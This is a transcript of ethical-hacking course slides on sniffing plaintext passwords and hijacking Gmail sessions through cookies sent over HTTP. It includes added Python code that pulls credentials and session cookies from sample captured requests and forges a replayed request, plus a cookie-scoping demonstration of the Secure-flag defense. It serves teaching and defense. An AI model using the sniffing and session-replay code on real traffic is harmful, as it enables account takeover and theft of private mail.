Ethical Hacking: Hacking Gmail. Teaching Hacking
TRANSCRIPT
Ethical Hacking: Hacking GMail
Teaching Hacking
What do Hackers Do?
Get into computer systems without valid accounts and passwords
Open encrypted files without the key
Take over Web servers
Collect passwords from Internet traffic
Take over computers with remote access trojans
And much, much more
Ethical Hackers
Ethical Hackers do the same thing criminal hackers do, with one difference
Ethical Hackers have permission from the owner of the machines to hack in
These "Penetration Tests" reveal security problems so they can be fixed
Two Hacking Classes
CNIT 123: Ethical Hacking and Network Defense
Has been taught since Spring 2007 (four times)
Face-to-face and Online sections available Fall 2008
CNIT 124: Advanced Ethical Hacking
Taught for the first time in Spring 2008
Certificate in Network Security
Associate of Science Degree
Student Agreement
Required for every student in CNIT 123: Ethical Hacking and Network Defense or CNIT 124: Advanced Ethical Hacking
Sniffing Plaintext Passwords
Insecure Login Pages
HTTP does not encrypt data: a password typed into a form served over HTTP crosses the network in plaintext
Always look for HTTPS on login pages
Tool: Cain
Click NIC icon to start sniffer
Click Sniffer tab, Password tab on bottom
From http://www.oxid.it/cain.html
Authentication Cookies
GMail Uses HTTPS
Sniffing for passwords won't work: the login is sent over HTTPS
Most Web mail services now use HTTPS for the login page too
Cookies
Thousands of people are using Gmail all the time
How can the server know who you are?
It puts a cookie on your machine that identifies you
Gmail's Cookies
Gmail identifies you with these cookies
In Firefox: Tools, Options, Privacy, Show Cookies
Cross-Site Request Forgery (XSRF)
Web-based Email
[Diagram: the target using email and the attacker sniffing traffic are on the same network segment, connected through a router to the Internet]
Cross-Site Request Forgery (XSRF)
Gmail sends the password through a secure HTTPS connection. That cannot be captured by the attacker.
But the cookie identifying the user is sent in the clear, over HTTP. That can easily be captured by the attacker.
The attacker gets into your account without learning your password.
Note: what this slide describes is session hijacking by stealing the cookie, which the Hamster reference calls sidejacking. The slide's label "XSRF" is kept, but cross-site request forgery usually means a different attack, one in which the victim's own browser is tricked into sending a request it did not intend.
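How the two captures described above look on the wire, as an added example that is not part of the original slides (the slides use Cain and Hamster for this): a small Python parser that pulls a password out of an HTTP login POST, decodes HTTP Basic authentication, and pulls the session cookie out of a later plain-HTTP request, then builds the replayed request that gets into the account without the password. The three captured requests, the hostnames webmail.example.net and intranet.example.net, the cookie name SID and every value are constructed for illustration.

```python
"""Pull plaintext credentials and session cookies out of captured HTTP.

Added example, not the slides' own code: a stand-in for what Cain's
Password tab and Hamster do with packets read off the wire.  Real sniffing
would read payloads with libpcap or scapy; the parsing step is the same.
"""
import base64
from urllib.parse import parse_qs

# Constructed capture (hosts, cookie name and values are made up): three TCP
# payloads an attacker on the same network segment could read.
CAPTURED_REQUESTS = [
    # 1. Login form submitted over plain HTTP: the password is in the body.
    b"POST /login HTTP/1.1\r\n"
    b"Host: webmail.example.net\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 23\r\n"
    b"\r\n"
    b"user=alice&pass=hunter2",
    # 2. Later page load over plain HTTP: the session cookie is in a header.
    b"GET /mail/inbox HTTP/1.1\r\n"
    b"Host: webmail.example.net\r\n"
    b"Cookie: SID=3f9a2c7e1b; lang=en\r\n"
    b"\r\n",
    # 3. HTTP Basic authentication: base64 is encoding, not encryption.
    b"GET /private HTTP/1.1\r\n"
    b"Host: intranet.example.net\r\n"
    b"Authorization: Basic Ym9iOnMzY3IzdA==\r\n"
    b"\r\n",
]

CREDENTIAL_FIELDS = ("user", "login", "email", "pass", "pwd")


def parse_http_request(raw):
    """Split one request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def extract_credentials(req):
    """Credentials visible in Basic auth or in a form-encoded POST body."""
    found = {}
    auth = req["headers"].get("authorization", "")
    if auth.lower().startswith("basic "):
        decoded = base64.b64decode(auth[6:]).decode("latin-1")
        found["user"], _, found["pass"] = decoded.partition(":")
    ctype = req["headers"].get("content-type", "")
    if req["method"] == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
        for name, values in parse_qs(req["body"].decode("latin-1")).items():
            if any(key in name.lower() for key in CREDENTIAL_FIELDS):
                found[name] = values[0]
    return found


def extract_cookies(req):
    """Name/value pairs from the Cookie header, if the request has one."""
    cookies = {}
    for part in req["headers"].get("cookie", "").split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def forge_hijacked_request(req, path="/mail/inbox"):
    """The request an attacker replays: same Host and Cookie, no password."""
    host = req["headers"]["host"]
    cookie = req["headers"]["cookie"]
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie}\r\n\r\n".encode()


def sniff(raw_requests):
    """Walk a capture and report every credential and cookie seen in clear."""
    findings = []
    for raw in raw_requests:
        req = parse_http_request(raw)
        host = req["headers"].get("host", "?")
        creds = extract_credentials(req)
        if creds:
            findings.append(("credentials", host, creds))
        cookies = extract_cookies(req)
        if cookies:
            findings.append(("cookies", host, cookies))
    return findings


if __name__ == "__main__":
    for kind, host, data in sniff(CAPTURED_REQUESTS):
        print(f"{kind:11} {host:22} {data}")
    print(forge_hijacked_request(parse_http_request(CAPTURED_REQUESTS[1])).decode())
```

Request 2 is the point of the slide: it carries no password, yet the forged request built from it is indistinguishable to the server from the victim's own, which is why the countermeasure has to keep the cookie off plain HTTP rather than just protect the login.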
Demonstration
XSRF Countermeasure
Use https://mail.google.com instead of http://gmail.com
This only helps if the session cookie is also marked Secure; a cookie without that flag is still sent in the clear whenever the browser makes any plain-HTTP request to the same domain
No other mail service has this option at all, as far as I know
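The cookie-scoping rule behind that caveat, as an added example that is not from the slides: a few lines of Python simulating which stored cookies a browser attaches to an http:// versus an https:// request, so a weak and a hardened Set-Cookie line for the same session cookie can be compared. The Set-Cookie lines, the hosts under example.net and the cookie name SID are constructed, not Gmail's actual cookies.

```python
"""Which stored cookies does a browser attach to a plain-HTTP request?

Added example, not from the slides.  Simulates the domain, path and Secure
checks a browser applies when building the Cookie header (expiry and
SameSite are ignored).  All Set-Cookie lines and hosts are constructed.
"""
from urllib.parse import urlparse


def parse_set_cookie(line):
    """Split one Set-Cookie value into (name, value, {attr: value or True})."""
    parts = [p.strip() for p in line.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        attrs[key.strip().lower()] = val.strip() or True
    return name.strip(), value.strip(), attrs


def store_cookie(jar, origin_host, set_cookie_line):
    """Add a cookie received from origin_host to the jar (a plain list)."""
    name, value, attrs = parse_set_cookie(set_cookie_line)
    jar.append({"name": name, "value": value, "attrs": attrs, "host": origin_host})


def domain_matches(host, cookie):
    domain = cookie["attrs"].get("domain")
    if isinstance(domain, str):
        domain = domain.lstrip(".")
        return host == domain or host.endswith("." + domain)
    return host == cookie["host"]  # host-only cookie


def path_matches(path, cookie):
    cpath = cookie["attrs"].get("path")
    if not isinstance(cpath, str):
        cpath = "/"
    return path == cpath or path.startswith(cpath.rstrip("/") + "/")


def cookies_sent_to(jar, url):
    """Cookies a browser would put in the Cookie header of a request to url."""
    u = urlparse(url)
    host, path = u.hostname or "", u.path or "/"
    over_tls = u.scheme == "https"
    return {
        c["name"]: c["value"]
        for c in jar
        if domain_matches(host, c)
        and path_matches(path, c)
        and (over_tls or not c["attrs"].get("secure"))
    }


def missing_flags(set_cookie_line):
    """Attributes a session cookie should carry but this line lacks."""
    _, _, attrs = parse_set_cookie(set_cookie_line)
    return [flag for flag in ("secure", "httponly") if flag not in attrs]


# Constructed responses: the same session cookie, set weakly and hardened.
WEAK_SET_COOKIE = "SID=3f9a2c7e1b; Domain=.example.net; Path=/"
HARDENED_SET_COOKIE = "SID=3f9a2c7e1b; Domain=.example.net; Path=/; Secure; HttpOnly"


def leaked_over_http(set_cookie_line, login_host="mail.example.net",
                     probe_url="http://mail.example.net/favicon.ico"):
    """Log in (over HTTPS) at login_host, then see what one plain-HTTP
    request, e.g. an image link the attacker injects into any page, carries."""
    jar = []
    store_cookie(jar, login_host, set_cookie_line)
    return cookies_sent_to(jar, probe_url)


if __name__ == "__main__":
    for label, line in (("weak", WEAK_SET_COOKIE), ("hardened", HARDENED_SET_COOKIE)):
        print(f"{label:8} missing={missing_flags(line)} "
              f"sent over http={leaked_over_http(line)} "
              f"sent over https={leaked_over_http(line, probe_url='https://mail.example.net/inbox')}")
```

Typing https:// changes what the user sends; the Secure attribute changes what the browser will ever send. A check of the countermeasure needs both: the login URL and the Set-Cookie headers the server returns.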
References
Cain: http://www.oxid.it/cain.html
Hamster: http://erratasec.blogspot.com/2007/08/sidejacking-with-hamster_05.html
Contact
Sam Bowne
Computer Networking and Information Technology
City College San Francisco
Email: [email protected]
Web: samsclass.info
Last modified 6-26-08